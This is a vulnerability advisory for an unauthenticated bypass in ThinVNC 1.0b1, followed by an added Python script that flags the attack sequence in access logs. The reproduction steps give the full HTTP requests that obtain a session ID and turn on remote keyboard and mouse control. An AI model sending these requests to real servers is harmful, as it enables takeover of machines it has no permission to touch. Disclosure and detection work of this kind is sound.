ThinVNC version 1.0b1 allows an unauthenticated user to bypass the authentication process via http://thin-vnc:8080/cmd?cmd=connect by obtaining a valid SID without any kind of authentication. It is possible to achieve code execution on the server by sending keyboard or mouse events to the server.
CVSSv3 Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSSv3 Base Score:
10.0
Steps to reproduce
Send a request to the application in order to obtain a valid SID.
GET /cmd?cmd=connect&destAddr=poc&id=0 HTTP/1.1
Host: 172.16.28.140:8081
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Referer: http://172.16.28.140:8081/
Cookie: SID=
Obtain the SID from the server response and create a new request in order to validate the SID.
GET /cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id=[SID] HTTP/1.1
Host: 172.16.28.140:8081
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Referer: http://172.16.28.140:8081/
Cookie: SID=[SID]
Now it is possible to send keystrokes or mouse moves to the server using the validated SID.
An exploit can be used to obtain a reverse shell on the server running the ThinVNC application.
Screenshots and files
System Information
Version: ThinVNC version 1.0b1.
Operating System: Windows 10.
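Detection logic for the request sequence in the steps above, added here as an example and not part of the original report or the ThinVNC project: it scans access logs for a client that requests `cmd=connect` and then `cmd=start` with keyboard or mouse control enabled. It assumes Common Log Format lines from a proxy or network sensor in front of the server and that successful requests return a 2xx status; the function name, the `trusted_sources` allowlist and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Common Log Format, assumed to come from a proxy or
# sensor in front of ThinVNC; addresses, timestamps and ids are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2022:10:00:01 +0000] "GET /cmd?cmd=connect&destAddr=poc&id=0 HTTP/1.1" 200 64
10.0.0.5 - - [01/Mar/2022:10:00:02 +0000] "GET /cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id=ABC123 HTTP/1.1" 200 32
192.168.1.20 - - [01/Mar/2022:10:05:00 +0000] "GET /cmd?cmd=connect&destAddr=desk&id=0 HTTP/1.1" 200 64
192.168.1.20 - - [01/Mar/2022:10:05:01 +0000] "GET /cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id=DEF456 HTTP/1.1" 200 32
10.0.0.9 - - [01/Mar/2022:10:07:00 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.7 - - [01/Mar/2022:10:08:00 +0000] "GET /cmd?cmd=start&kbdControl=true&id=XYZ HTTP/1.1" 200 32
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def find_control_sessions(log_text, trusted_sources=frozenset()):
    """Alert on each untrusted client that does cmd=connect, then cmd=start with input control."""
    connected = {}  # client ip -> timestamp of its last successful cmd=connect
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["ip"] in trusted_sources:
            continue
        url = urlsplit(m["target"])
        # Only successful requests to the /cmd endpoint are relevant.
        if url.path != "/cmd" or not m["status"].startswith("2"):
            continue
        query = parse_qs(url.query)
        cmd = query.get("cmd", [""])[0]
        if cmd == "connect":
            connected[m["ip"]] = m["ts"]
        elif cmd == "start" and m["ip"] in connected:
            controls = [k for k in ("kbdControl", "mouseControl")
                        if query.get(k, [""])[0].lower() == "true"]
            if controls:
                alerts.append({"client": m["ip"], "connect_at": connected.pop(m["ip"]),
                               "start_at": m["ts"], "controls": controls})
    return alerts

if __name__ == "__main__":
    for alert in find_control_sessions(SAMPLE_LOG, trusted_sources={"192.168.1.20"}):
        print(alert)
```

Because the report shows the session being obtained without credentials, the sequence alone does not distinguish a legitimate user; the allowlist of expected administration hosts is what turns it into a useful signal.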